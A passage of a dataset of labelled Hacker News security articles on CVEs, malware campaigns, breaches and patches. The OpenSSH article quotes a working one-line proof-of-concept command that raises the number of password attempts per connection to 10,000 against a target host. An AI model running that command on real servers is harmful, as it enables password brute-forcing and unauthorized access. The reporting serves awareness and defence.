In Android version 4.0 and below, installed apps with READ_LOGS permission can easily read Android system logs to identify the name of the Firefox user profile folder.
3.) Automatic File Download to SD Card (CVE-2014-1515) - Firefox for Android will download any file automatically to the SD card, if not of any known extension. Malicious apps with READ_EXTERNAL_STORAGE permission can read files from the SD card to extract non-renderable data such as the cookies database.
4.) Crash Reporter File Manipulation (CVE-2014-1506) - In cases where the application crashes, Firefox sends the crash dumps located in /data/data/org.mozilla.firefox/files/mozilla/Crash Reports/pending on the device file system. Using the exploit, an attacker can manipulate the crash report file path to the Android Log file in order to steal it. Researchers have also explained second way to hack user data using this vulnerability.
RESEARCH PAPER:
Researchers have already reported these vulnerabilities to the Mozilla and three out of four are already been patched in the latest versions. Android users with Firefox installed in the device are advised to upgrade it to Mozilla Firefox 28.0 or later from the Google Play app store.
",Vulnerability
Researchers Uncover Hacking Operations Targeting Government Entities in South Korea,https://thehackernews.com/2021/06/researchers-uncover-hacking-operations.html,"A North Korean threat actor active since 2012 has been behind a new espionage campaign targeting high-profile government officials associated with its southern counterpart to install an Android and Windows backdoor for collecting sensitive information.
Cybersecurity firm Malwarebytes attributed the activity to a threat actor tracked as Kimsuky, with the targeted entities comprising of the Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, and the Deputy Consul General at Korean Consulate General in Hong Kong.
The attacks also involved collecting information about other organizations and universities in the country, including the Korea Internet and Security Agency (KISA), Seoul National University, and Daishin Securities. Malwarebytes, however, noted that there is no evidence of active targeting or compromise by the adversary.
The development is only the latest in a series of surveillance efforts aimed at South Korea. Believed to be operating on behalf of the North Korean regime, Kimsuky (aka Velvet Chollima, Black Banshee, and Thallium) has a track record of singling out South Korean entities while expanding their victimology to the U.S., Russia, and various nations in Europe.
Last November, the adversary was linked to a new modular spyware suite called ""KGH_SPY,"" which allows it to carry out reconnaissance of target networks, log keystrokes, and steal confidential information, as well as a stealthy malware under the name ""CSPY Downloader"" that's designed to thwart analysis and download additional payloads.
Kimsuky's attack infrastructure consists of various phishing websites that mimic well known websites such as Gmail, Microsoft Outlook, and Telegram with an aim to trick victims into entering their credentials. ""This is one of the main methods used by this actor to collect email addresses that later will be used to send spear-phishing emails,"" Malwarebytes researcher Hossein Jazi said.
In using social engineering as a core component of its operations, the goal is to distribute a malware dropper that takes the form of a ZIP archive file attached to the emails, which ultimately leads to the deployment of an encoded DLL payload called AppleSeed, a backdoor that's been put to use by Kimsuky as early as 2019.
""Besides using the AppleSeed backdoor to target Windows users, the actor also has used an Android backdoor to target Android users,"" Jazi noted. ""The Android backdoor can be considered as the mobile variant of the AppleSeed backdoor. It uses the same command patterns as the Windows one. Also, both Android and Windows backdoors have used the same infrastructure.""
AppleSeed has all the hallmarks of a typical backdoor, with myriad capabilities to record keystrokes, capture screenshots, collect documents with specific extensions (.txt, .ppt, .hwp, .pdf, and .doc), and gather data from removable media devices connected to the machine, all of which are then uploaded to a remote command-and-control server.
But perhaps the most interesting discovery of all is that the threat actor calls themselves Thallium in the malware source code, which is the moniker assigned by Microsoft based on its tradition of naming nation-state hacking groups after chemical elements.
",Malware
Facebook Sued Hong Kong Firm for Hacking Users and Ad Fraud Scheme,https://thehackernews.com/2019/12/facebook-account-hacking.html,"Following its efforts to take legal action against those misusing its social media platform, Facebook has now filed a new lawsuit against a Hong Kong-based advertising company and two Chinese individuals for allegedly abusing its ad platform to distribute malware and Ad fraud.
Facebook filed the lawsuit on Thursday in the Northern District of California against ILikeAd Media International Company Ltd. as well as a Chinese software developer and a marketing director working for the firm, Chen Xiao Cong and Huang Tao.
All three defendants have been alleged to have deceived people into installing malware on their systems, enabling them to compromise user's Facebook accounts and then using those hacked accounts to advertise counterfeit goods and diet pills—which is clearly in violation of Facebook's Terms and Advertising Policies.
""The suit seeks to hold accountable ILikeAd Media International Company Ltd. and Chen Xiao Cong and Huang Tao for creating the malware, tricking people into installing it, compromising people's Facebook accounts and then using people's accounts to run deceptive ads,"" Facebook said in a blog post today when announcing the lawsuit.
According to the social media giant, the defendants made use of improper practices such as ""celeb bait"" and ""cloaking"" to bait Facebook users into downloading and installing malware that eventually compromised their Facebook accounts.
While 'cloaking' involves deliberately disguising the true destination of a link in the ad by displaying one version of the ad's landing page to Facebook and another version to Facebook users, 'celeb bait' involves misusing celebrities photos in ads to entice users to click on them.
""Cloaking schemes are often sophisticated and well organized, making the individuals and organizations behind them difficult to identify and hold accountable. As a result, there have not been many legal actions of this kind,"" Facebook said.
Since April, Facebook has notified hundreds of thousands of users that their accounts may have been compromised and instructing them to change their passwords, according to the complaint.
Facebook also said the social media company had issued more than $4 million in refunds to victims whose Facebook accounts were used to run unauthorized ads and also helped to secure their accounts compromised in this malicious advertisement scheme.
This is the latest lawsuit that Facebook filed in a federal court against entities and individuals abusing its properties for malicious intent.
Just over a month ago, Facebook sued surveillance vendor NSO Group for allegedly hacking 1,400 mobile devices by misusing the company's secure messaging platform, WhatsApp.
In August this year, Facebook also filed a lawsuit against two shady Android app developers, Hong Kong-based 'LionMobi' and Singapore-based 'JediMobi,' for allegedly running a ""click injection fraud"" scheme that programmed bots to click on Facebook ads.
In March this year, Facebook also took two Ukrainian men into the courts for allegedly using quiz apps on the platform to distribute malware that steals Facebook users' data.
",Malware
Millions of PCs Found Running Outdated Versions of Popular Software,https://thehackernews.com/2019/01/software-vulnerabilities-hacking.html,"It is 2019, and millions of computers still either have at least one outdated application installed or run outdated operating systems, making themselves vulnerable to online threats and known security vulnerabilities/exploits.
Security vendor Avast has released its PC Trends Report 2019 revealing that millions of users are making themselves vulnerable to cyber attacks by keeping outdated versions of popular applications on their computers.
Probably the most overlooked vectors for any cyber attack is out-of-date programs, which most of the times, is the result of the users' laziness and company's administrators ignoring the security updates in a business environment as they can't afford the downtime.
According to the report [PDF], Adobe Shockwave tops the list of software that most user left outdated on their PCs, followed by VLC Media Player, Skype, Java Runtime Environment , 7-Zip File Manager, and Foxit Reader.
The outdated software applications often provide an open door for hackers and cybercriminals to take advantage of security bugs and loopholes in the programs, making them a potential target of cyber attacks.
However, it is not only applications but also operating systems that are out of date. Almost 15% of all Windows 7 computers and 9% of all Windows 10 computers are running an outdated version of the operating systems.
To understand the risk, there could be no better example than the Global WannaCry menace that largely infected networks that used out-of-date operating systems, like Windows XP, for which Microsoft no longer offers technical support.
WannaCry was taking advantage of a dangerous security hole in Microsoft Windows that had already been fixed by the company months before the ransomware threat strikes the whole world.
""Most of us replace our smartphone regularly, but the same cannot be said for our PCs. With the average age of a PC now reaching six years old, we need to be doing more to ensure our devices are not putting us at unnecessary risk,"" said Avast President Ondrej Vlcek.
""With the right amount of care, such as cleaning our hardware's insides using cleaners, optimization and security products, PCs will be safe and reliable for even longer.""
The bottom line: Keeping your operating systems and software applications patched and up-to-date can protect you from cyber attacks and prevent hackers from taking advantage of your vulnerable machine to steal your personal and sensitive data.
",Vulnerability
DDoS Attack Takes Down Central Heating System Amidst Winter In Finland,https://thehackernews.com/2016/11/heating-system-hacked.html,"Just Imaging — What if, you enter into your home from a chilling weather outside, and the heating system fails to work because of a cyber attack, leaving you in the sense of panic?
The same happened late last month when an attack knocks heating system offline in Finland.
Last week, a Distributed Denial of Service (DDoS) attack led to the disruption of the heating systems for at least two housing blocks in the city of Lappeenranta, literally leaving their residents in subzero weather.
Both the apartments are managed by a company called Valtia, a facilities services company headquartered in Lappeenranta.
Valtia CEO Simo Rounela confirmed to English language news outlet Metropolitan.fi that the central heating system and hot water system in both buildings had become a target of DDoS attacks.
In an attempt to fight back the cyber attacks, which lived for a short time, the automated systems rebooted — and unfortunately got stuck in an endless loop, which restarted repeatedly and eventually shut down heating systems for more than a week.
Also Read: Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country.
The incident is extremely worrying because in a location as cold as Finland – where temperatures at this time month are below freezing – taking heating systems offline for over a week could result in death, particularly with old-aged people.
Fortunately for the buildings' residents, it was not that cold in Lappeenranta.
The attack started in late October and ended on 3rd November afternoon. Here's what a brief post on the company's website reads:
""Over 90 percent of the [remote systems] in the area of terraced houses or larger buildings will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears,"" as the systems are designed to shut down for safety. ""The systems must be actively monitored and adjusted.""
According to another local media outlet, Helsingin Sanomat, Valtia quickly relocated those affected systems and switched the heating systems over to manual, while the company addressed the DDoS attacks and brought the control systems ""back into the grid, this time from behind a firewall.""
The report attributes the cyber attack to the Mirai botnet – the same infamous IoT botnet that caused vast internet outage over two weeks ago by launching massive DDoS attacks against DNS provider Dyn.
Dangerous Threats of Massive IoT Botnets
Mirai botnet malware scans for insecure IoT devices, like security cameras, DVRs, and routers, that uses their default passwords and then enslaves them into a botnet network, which is then used to launch DDoS attacks.
The latest incident isn't a disastrous situation, but it is enough to make it crystal clear that these Internet-connected systems can cause a significant consequence in our physical world as well.
Just imagine if these control systems can not be manually adjusted by the people who truly rely on them?
In this case, any cyber attack that knocks these systems down is potentially dangerous and even deadly in the event of extreme temperatures.
This incident once again highlights the dangerous threats of massive DDoS attacks, which are now emerging from Millions of insecure Internet of Things (IoT) devices, whereby attackers can simply launch a DDoS to take down any critical service – no need to infect it with malware or viruses.
So the best way to protect your smart devices from being a part of DDoS botnet is to be more vigilant about the security of your internet-connected devices.
",Cyber_Attack
Banking System Vulnerability - 3 million bank accounts hacked in Iran,https://thehackernews.com/2012/04/banking-system-vulnerability-3-million.html,"Banking System Vulnerability - 3 million bank accounts hacked in Iran
Iran's Central Bank has announced that the electronic information of 3 million customers of 10 Iranian banks have been compromised. These banks now require their customers to change their ATM pin numbers before they can access their account. This has caused a rush to the ATM machines by the worried customers.
The hacker was identified as Khosro Zare', a former bank-system specialist in Iran who recently left the country.Zare' claimed in a blog that he hacked the PIN codes to highlight the vulnerability of Iran's banking system.
According to the report, the hacker had provided the managing directors of the targeted banks with information about the bank accounts of 1000 customers in the previous Iranian calendar year (ended on March 19) to warn them about the susceptibility of their computer systems and networks to cyber threats.
But Central bank officials had earlier downplayed the reports, saying that ""the threat to Iran's banking system is not serious.""
Finally to proof the Vulnerability he dumped the account details of around 3 million individuals, including card numbers and PINs, on his blog ircard.blogspot.ca.
At least three Iranian banks (Saderat, Eghtesad Novin, and Saman) have already sent text messages to their clients, warning them to change their debit card PINs. The warning was repeated on state TV channels.
",Vulnerability
Popular Online Tutoring Marketplace 'Wyzant' Suffers Data Breach,https://thehackernews.com/2019/05/wyzant-data-breach.html,"Wyzant—an online marketplace that makes it easy for parents and students to connect with private tutors, in-person and online, in over 250 different subjects—has suffered a data breach exposing ""certain personal identification information"" for its customers.
The Hacker News received a copy of an email notification Wyzant recently sent to its affected customers, which reveals an unknown attacker was able to gain access to one of its databases on April 27, which the company identified a week after the security incident.
The stolen personal identification information for affected customers includes their first name, last name, email address, zip code, and, for certain customers, their Facebook profile image as well who log-in to the platform using Facebook.
Wyzant also explicitly made it clear that the stolen data did not include any password, payment information, or record of its customers' activity on the Wyzant platform, and that no other than the above-mentioned data was known to have been accessed.
Though it is still unclear how many customers were actually hit by the security breach, or if both tutors and students are affected, or what security hole the unknown attackers exploited to get into the company's network, the company did confirm that it has now patched the underlying issue.
With more than 2 million registered users and over 76,000 active tutors in its database, Wyzant is a decade-old popular tutoring service that bring students and instructors together, online and in-person.
In response to the security incident, Wyzant says it is performing an extensive audit of its entire network and application security infrastructure and will notify its customers of any significant development.
""Wyzant has implemented additional security measures designed to prevent a recurrence of such an attack and to protect the privacy of our valued customers,"" the company says.
""This includes reviewing our security processes and protocols. We are also working closely with law enforcement to ensure the incident is properly addressed.""
For affected customers, Wyzant also warned them to beware of potential phishing attacks wherein attackers could use their personal information to trick them into providing additional personal information, such as credit card information or passwords.
The Hacker News has reached out to the company to know more about the data breach incident and will update this article as soon as we'll hear back from it.
",Cyber_Attack
Yahoo Flaw Allowed Hackers to Read Anyone's Emails,https://thehackernews.com/2016/12/hack-yahoo-email.html,"Yahoo has patched a critical security vulnerability in its Mail service that could have allowed an attacker to spy on any Yahoo user's inbox.
Jouko Pynnönen, a Finnish Security researcher from security firm Klikki Oy, reported a DOM based persistent XSS (Cross-Site Scripting) in Yahoo mail, which if exploited, allows an attacker to send emails embedded with malicious code.
In his blog post published today, the researcher demonstrated how a malicious attacker could have sent the victim's inbox to an external site, and created a virus that attached itself to all outgoing emails by secretly adding a malicious script to message signatures.
Since the malicious code is in the message's body, the code will get executed as soon as the victim opens the boobytrapped email and its hidden payload script will covertly submit victim's inbox content to an external website controlled by the attacker.
This issue is because Yahoo Mail failed to properly filter potentially malicious code in HTML emails.
""It would be possible to embed a number of HTML attributes that are passed through Yahoo's HTML filter and treated specially,"" Pynnönen says in his blog post.
Pynnönen says he found the vulnerability by force-feeding all known HTML tags and attributes in order to the filter that Yahoo uses to weed out malicious HTML, but certain malicious HTML code managed to pass through.
""As a proof of concept I supplied Yahoo Security with an email that, when viewed, would use AJAX to read the user's inbox contents and send it to the attacker's server,"" Pynnönen says.
Pynnönen privately disclosed the vulnerability to Yahoo through its HackerOne bug bounty program and was awarded a $10,000 bounty.
Pynnönen reported a similar vulnerability in the web version of the Yahoo! Mail service earlier this year for which he earned $10,000. He also reported a stored XSS vulnerability in Flickr to Yahoo in December 2015 for which he earned $500.
",Vulnerability
"FBI, CISA, NSA Officially Blame Russia for SolarWinds Cyber Attack",https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html,"The U.S. government on Tuesday formally pointed fingers at the Russian government for orchestrating the massive SolarWinds supply chain attack that came to light early last month.
""This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks,"" the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) said in a joint statement.
Russia, however, denied any involvement in the operation on December 13, stating it ""does not conduct offensive operations in the cyber domain.""
The FBI, CISA, ODNI, and NSA are members of the Cyber Unified Coordination Group (UCG), a newly-formed task force put in place by the White House National Security Council to investigate and lead the response efforts to remediate the SolarWinds breach.
A Much Smaller Number Compromised
Calling the campaign an ""intelligence gathering effort,"" the intelligence bureaus said they are currently working to understand the full scope of the hack while noting that fewer than 10 U.S. government agencies were impacted by the compromise.
The names of the affected agencies were not disclosed, although previous reports have singled out the U.S. Treasury, Commerce, State, and the Departments of Energy and Homeland Security among those that have detected tainted SolarWinds' network management software installations, not to mention a number of private entities across the world.
An estimated 18,000 SolarWinds customers are said to have downloaded the backdoored software update, but the UCG said only a smaller number had been subjected to ""follow-on"" intrusive activity on their internal networks.
Microsoft's analysis of the Solorigate modus operandi last month found that the second-stage malware, dubbed Teardrop, has been selectively deployed against targets based on intel amassed during an initial reconnaissance of the victim environment for high-value accounts and assets.
The joint statement also confirms previous speculations that linked the espionage operation to APT29 (or Cozy Bear), a group of state-sponsored hackers associated with the Russian Foreign Intelligence Service (SVR).
The hacking campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to spy on government agencies and other companies for at least nine months, including viewing source code and stealing security tools, by the time it was discovered.
SolarWinds Faces Class Action Lawsuit
Meanwhile, SolarWinds is facing further fallout after a shareholder of the IT infrastructure management software company filed a class-action lawsuit in the U.S. District Court for the Western District of Texas on Monday against its president, Kevin Thompson, and chief financial officer, J. Barton Kalsu, claiming the executives violated federal securities laws under the Securities Exchange Act of 1934.
The complaint states that SolarWinds failed to disclose that ""since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran,"" and that ""SolarWinds' update server had an easily accessible password of 'solarwinds123',"" as a result of which the company ""would suffer significant reputational harm.""
",Cyber_Attack
Flame Malware Spread Via Rogue Microsoft Security Certificates,https://thehackernews.com/2012/06/flame-malware-spread-via-rogue.html,"Flame Malware Spread Via Rogue Microsoft Security Certificates
Microsoft released an emergency Windows update on Sunday after revealing that one of its trusted digital signatures was being abused to certify the validity of the Flame malware that has infected computers in Iran and other Middle Eastern Countries.
The patch revoked three intermediate Microsoft certificates used in active attacks to ""spoof content, perform phishing attacks, or perform man-in-the-middle attacks"".Microsoft also killed off certificates that were usable for code signing via Microsoft's Terminal Services licensing certification authority (CA) that ultimately ""chained up"" to the Microsoft Root Authority.The authority issued certificates for users to authorise Remote Desktop services in their enterprises.
The Microsoft blog post explains that a vulnerability in an old cryptography algorithm is exploited by some elements of Flame to make them appear as if they originated from Microsoft. Most systems around the world accept officially-signed Microsoft code as safe by default, so the malware would enter unnoticed.
Windows users are urged to install the new KB2718704 patch. If you enabled Automatic Updates, the patch should automatically install. If not, you can open Windows Update on your PC and manually install it.
Since the virus is highly targeted and can be caught by most antivirus programs, the ""vast majority of customers are not at risk,"" according to Microsoft.
",Malware
Google announces $2.7 million Reward for hacking Chrome OS at Pwnium Contest,https://thehackernews.com/2014/01/google-announces-27-million-reward-for.html,"Pwnium is the annual Hacking competition where Google invites coders from around the world to find security holes in Google Chrome.
Google has announced its 4th Pwnium Hacking Contest hosted at the Canadian Security conference in March, offering more than $2.7 million in potential rewards for hacking Chrome OS-running ARM and Intel Chromebook.
This year the security researchers have a choice in between an ARM-based Chromebook, the HP Chromebook 11 (WiFi) and the Acer C720 Chromebook (2GB WiFi) based on Intel's Haswell microarchitecture.
The attack must be demonstrated against one of these devices running ""then-current"" stable version of Chrome OS.
""Security is a core tenet of Chromium, which is why we hold regular competitions to learn from security researchers. Contests like Pwnium help us make Chromium even more secure,"" Jorge Lucángeli Obes, Google Security Engineer said.
Amongst the payouts are $110,000 for the browser or system-level compromise in guest mode or as a logged-in user, delivered via a web page.
Google will also pay USD 150,000 for providing an exploit, able to persistently compromise an HP or Acer Chromebook, i.e. hacking the device to retain control even after a reboot.
Google further revealed that it will be giving out bonuses to all those who come up with an impressive exploit to defeat kASLR, exploiting memory corruption in the 64-bit browser process or exploiting the kernel directly from a renderer process. The full exploit must be given to Google with explanations for all individual bugs used.
""To register, email pwnium4@chromium.org. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014. Only exploits demonstrated on time in this specifically-arranged window will be eligible for a reward.""
The earlier editions of Pwnium competitions focussed on Intel-based Chrome OS devices, and Google had paid out $50,000 to a prolific hacker who goes by ""Pinkie Pie,"" for an exploit.
Do you think you are up to the task? Gear up your keyboards & Give it a try!
",Vulnerability
Bitcoin Core Software Patches a Critical DDoS Attack Vulnerability,https://thehackernews.com/2018/09/bitcoin-core-software.html,"The Bitcoin Core development team has released an important update to patch a major DDoS vulnerability in its underlying software that could have been fatal to the Bitcoin Network, which is usually known as the most hack-proof and secure blockchain.
The DDoS vulnerability, identified as CVE-2018-17144, has been found in the Bitcoin Core wallet software, which could potentially be exploited by anyone capable of mining BTC to crash Bitcoin Core nodes running software versions 0.14.0 to 0.16.2.
In other words, Bitcoin miners could have brought down the entire blockchain either by overflooding the block with duplicate transactions, resulting in blockage of transaction confirmation from other people or by flooding the nodes of the Bitcoin P2P network and over-utilizing the bandwidth.
The vulnerability had been around since March last year, but the team says nobody noticed the bug or nobody was willing to incur the expense of exploiting it.
According to the bitcoin core developers, all recent versions of the BTC system are possibly vulnerable to the Distributed Denial of Service (DDoS) attacks, though there's a catch—attacking Bitcoin is not cheap.
The DDoS attack on the BTC network would cost miners 12.5 bitcoins, which is equal to almost $80,000 (£60,000), in order to perform successfully.
The Bitcoin Core team has patched the vulnerability and are urging miners to update with the latest Bitcoin Core 0.16.3 version as soon as possible.
""A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2. It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible,"" the vulnerability note reads.
Although the team says that the miners running Bitcoin Core only occasionally are not in danger of such attacks, it would obviously be recommended to upgrade to the latest software version as soon as possible just to be on the safe side.
In addition to the DDoS vulnerability, the latest version also includes patches for a non-insignificant number of minor bugs, related to consensus, RPC and other APIs, invalid error flags, and documentation.
After upgrading to the latest version—the process that will take five minutes to half an hour depending upon the processing power of your computer—users should note that the new wallet will have to redownload the entire blockchain.
",Vulnerability
Potential backdoors discovered in US-based components used by French Satellites,https://thehackernews.com/2014/01/potential-backdoors-discovered-in-us.html,"United Arab Emirates (UAE) may terminate a $930 Million USD contract with France based companies for the supply of two two military Imaging satellites due to the discovery of several US produced components in them.
Now the deal is in danger because the UAE claims it has discovered backdoors in the components which are manufactured in the United States, reported by the Defense News.
The contract, sealed in July 2013, includes a ground station, the Pleiades-type satellites (aka Falcon Eye) are due for delivery 2018.
The revelation was provided by high-level UAE sources, the companies involved in the business are the prime contractor Airbus Defense and Space, and payload maker Thales Alenia Space.
""If this issue is not resolved, the UAE is willing to scrap the whole deal,"" he added. UAE authorities suspect the presence of vulnerabilities would ""provide a back door to the highly secure data transmitted to the ground station"".
An unnamed UAE source has confirmed that the presence of backdoor has been reported to Sheikh Mohammed Bin Zayed, deputy supreme commander of the UAE's armed forces.
The contract signed with French companies includes two high-resolution observation satellites and the operational support from France with training for 20 engineers.
UAE representatives are evaluating alternative partners for the supply, Russian industry may be more likely supplier.
""The UAE has drawn on Russian technology, with the GLONASS space-based navigation system fitted as a redundancy feature on a Western European weapon system,"" a French defense expert said.
While some security experts believe that French industry had drawn on the US technology due complexity of the payload, other specialists found intriguing that France had drawn on US technology for the satellites under the Falcon Eye program.
""France operates the Pleiades spy satellite in what is viewed as a critical piece of the nation's sovereignty. Given that core competence, it seemed strange that France would use US technology, although there is an agreement between Paris and Washington over transfer of capabilities, "" said a Defense analysts.
The Defense News also speculated on the fact that the claims may be an attempt to condition another contract for Dassault Aviation Rafale fighters, both French companies were available for comment.
",Data_Breaches
Warning: 10 Million UK Users targeted with Cryptolocker Ransomware spam email campaign,https://thehackernews.com/2013/11/Cryptolocker-Ransomware-spam-emails-campaign-ten-million-users.html,"The UK's National Crime Agency has given out an urgent national alert that a mass spamming event targeting 10 million UK based email users with a piece of malware called CryptoLocker that encrypts your files and then demands a ransom money to restore access.
The agency has said that the people who are majorly receiving targeted spam emails that appear to be from banks and other financial institutions.
Each email comes with attachments that look like files such as a voicemail, fax, an invoice or details of a suspicious transaction, but is in fact Cryptolocker Ransomware malware that encrypts the user's computer. The public should be aware not to click on any such attachment.
On Infected system, The Cryptolocker Malware screen will then display a countdown timer that demands the payment of 2 Bitcoins in ransom, worth around £536, for the decryption key.
The NCCU is trying to trace that who is sending the emails. ""We are working in cooperation with industry and international partners to identify and bring to justice those responsible and reduce the risk to the public."" Lee Miles, Deputy Head of the NCCU says.
Bitdefender Labs, an anti-virus company found that in the week beginning Oct. 27, more than 12,000 computers were infected and before the criminal group seemed to be exclusively targeting computers in the U.S.
The UK crime agency said it advised users not to pay the ransom and warned that even if it were paid, there was no guarantee the encryption key would be turned over. Anyone whose computer is infected should report it to www.actionfraud.police.uk.
NCA has put out a few recommendations to avoid infection including, files should be backed up routinely and preserved off the network.
Read more detailed articles on Cryptolocker Ransomware:
Cryptolocker Ransomware makes different Bitcoin wallet for each victim
CryptoLocker Ransomware demands $300 or Two Bitcoins to decrypt your files
CryptoLocker developer launches Decryption Service website; 10 Bitcoins for Decryption Keys
",Malware
COVID-19: Hackers Begin Exploiting Zoom's Overnight Success to Spread Malware,https://thehackernews.com/2020/03/zoom-video-coronavirus.html,"As people increasingly work from home and online communication platforms such as Zoom explode in popularity in the wake of coronavirus outbreak, cybercriminals are taking advantage of the spike in usage by registering new fake ""Zoom"" domains and malicious ""Zoom"" executable files in an attempt to trick people into downloading malware on their devices.
According to a report published by Check Point and shared with The Hacker News, over 1,700 new ""Zoom"" domains have been registered since the onset of the pandemic, with 25 percent of the domains registered in the past seven days alone.
""We see a sharp rise in the number of 'Zoom' domains being registered, especially in the last week,"" said Omer Dembinsky, Manager of Cyber Research at Check Point.
""The recent, staggering increase means that hackers have taken notice of the work-from-home paradigm shift that COVID-19 has forced, and they see it as an opportunity to deceive, lure, and exploit. Each time you get a Zoom link or document messaged or forwarded to you, I'd take an extra look to make sure it's not a trap.""
With over 74,000 customers and 13 million monthly active users, Zoom is one of the most popular cloud-based enterprise communication platforms that offers chat, video and audio conferencing, and options to host webinars and virtual meetings online.
The popularity of Zoom has shot up significantly in recent weeks as millions of students, business people, and even government employees across the world are forced to work and socialize from home during the coronavirus pandemic.
The report comes following a significant increase in the number of malicious coronavirus-related domains, with bad actors finding new ways to profit off the global health concern to stage a variety of malware attacks, phishing campaigns, and create scam sites and malicious tracker apps.
What's more, the researchers said they detected malicious files with the name ""zoom-us-zoom_##########.exe,"" which when executed, installed potentially unwanted programs (PUPs) such as InstallCore, a dodgy bundleware application that's known to install other kinds of malware.
But Zoom is not the only app to be targeted by cybercriminals. With schools turning to online learning platforms to keep students occupied, Check Point researchers said they also discovered phishing sites masquerading as the legitimate Google Classroom (e.g., googloclassroom\.com and googieclassroom\.com) website to trick unwitting users into downloading malware.
Zoom Fixes Privacy Issue in Its iOS App
Zoom, for its part, has had its share of privacy and security issues too. Last year, the video conferencing app fixed a vulnerability that could let websites hijack users' webcam and ""forcibly"" join them to a Zoom call without their permission.
Then earlier this January, the company squashed another bug that could have allowed attackers to guess a meeting ID and join an unprotected meeting, potentially exposing private audio, video, and documents shared throughout the session. Following the disclosure, Zoom introduced default passwords for each meeting that participants need to enter when joining by manually entering the meeting ID.
And finally, just over the weekend, Zoom updated its iOS app after it was caught sending device information and a unique advertiser identifier to Facebook using the social network's software development kit (SDKs) and concerns were raised over its failure to disclose the data sharing in its privacy policy.
Highlighting some of the privacy risks associated with using Zoom's products, The Electronic Frontier Foundation (EFF) said hosts of Zoom calls can see if participants have the Zoom video window active or not to track if they are paying attention. Administrators can also see the IP address, location data, and device information of each participant.
To safeguard yourself from such threats, it's essential that the apps are kept up-to-date, and be on the lookout for emails from unknown senders and lookalike domains that contain spelling errors.
Besides this, also don't open unknown attachments or click on promotional links in the emails, the cure for Corona will not arrive via email, and also ensure you're ordering goods from only authentic sources.
",Malware
Bug in OpenSSH Opens Linux Machines to Password Cracking Attack,https://thehackernews.com/2015/07/openssh-password-cracking.html,"A simple but highly critical vulnerability recently disclosed in the most widely used OpenSSH software allows attackers to try thousands of password login attempts per connection in a short period.
OpenSSH is the most popular software widely used for secure remote access to Linux-based systems. Generally, the software allows 3 to 6 Password login attempts before closing a connection, but a new vulnerability lets attackers perform thousands of authentication requests remotely.
OpenSSH servers with keyboard-interactive authentication enabled, including FreeBSD Linux, can be exploited to carry out the brute force attack on OpenSSH protocol, a security researcher with online alias KingCope explained in a blog post.
Exploit for the Vulnerability RELEASED
Hackers could widely exploit the vulnerability because the keyboard-interactive authentication is by default enabled on most of the systems.
Researcher has also released a proof-of-concept exploit code, which is just a command, as follows:
ssh -lusername -oKbdInteractiveDevices=`perl -e 'print ""pam,"" x 10000'` targethost
This simple command effectively allows up to 10,000 password attempts within two minutes of login grace time.
""The crucial part is that if the attacker requests 10,000 keyboard-interactive devices OpenSSH will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded,"" KingCope said.
However, depending on the connection and the victim's Linux machine, two minutes of 'grace period' and thousands of login attempts are enough to achieve successful login by using dictionary attack with a word-list of most commonly used passwords.
The vulnerability is present in the latest version of OpenSSH, which is Version 6.9.
How to Mitigate the Attack?
Administrators are advised to take following precautions until OpenSSH releases an official patch to address the issue:
Use a cryptographic key pair that is at least 2,048 Bits in length
Always Use a Strong Password to protect your Private Key
Reducing the grace period to 20 or 30 seconds
Use Fail2Ban or Pam-Shield to limit failed login attempts
",Vulnerability
Samba Service Hit By Remote Code Execution Vulnerability,https://thehackernews.com/2015/02/samba-service-hit-by-remote-code.html,"A critical vulnerability has been fixed in Samba — Open Source standard Windows interoperability suite of programs for Linux and Unix, that could have allowed hackers to remotely execute an arbitrary code in the Samba daemon (smbd).
Samba is an open source implementation of the SMB/CIFS network file sharing protocol that works on the majority of operating systems available today, which allows a non-Windows server to communicate with the same networking protocol as the Windows products. Samba is supported by many operating systems including Windows 95/98/NT, OS/2, and Linux.
smbd is the server daemon of Samba which provides file sharing and printing services to clients using the SMB/CIFS protocol. Samba is also sometimes installed as a component of *BSD and OS X systems.
The vulnerability, designated as CVE-2015-0240, actually resides in this smbd file server daemon. The bug can be exploited by hackers to potentially execute code remotely with root privileges, the Samba development team warned.
The team discovered that the vulnerability allowed a malicious client to send some packets that could free memory in a consecutive anonymous netlogon packet, leading to unexpected execution of random code. In case, root privileges are required which is automatic and no login or authentication is necessary.
The security vulnerability affects all versions of the Samba software, from the oldest supported stable release, Samba versions 3.5.0, to the current development version, 4.2.0 Release Candidate (RC) 4, the Samba Project said in a security alert.
Red Hat product team published a detailed analysis of this vulnerability on its blog post. According to the researchers, Red Hat Enterprise Linux versions 5 through 7 are affected, as are Red Hat Storage Server versions 2.1 and 3. Except RHEL7, the vulnerability is marked critical for all of the affected products. Other Linux distributions have also posted security alerts about the vulnerability.
A large number of users might potentially be at risk because Samba ships with a wide range of Linux distributions. However, users affected by the critical vulnerability also depends on which operating system they run on their machines.
The Samba development team has fixed the flaw in the new Samba version, Samba 4.1.17, which is available to download. The credit for discovering and reporting the flaw in Samba goes to the Microsoft Vulnerability Researcher, Richard van Eeden, who also provided the patch.
Meanwhile, other major Linux distributions, including Ubuntu, Debian and Suse, have also released updated packages in their repositories, with others to follow soon.
",Vulnerability
Microsoft Patches Two Zero-Day Flaws Under Active Attack,https://thehackernews.com/2018/05/microsoft-patch-tuesday.html,"It's time to gear up for the latest May 2018 Patch Tuesday.
Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs.
In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.
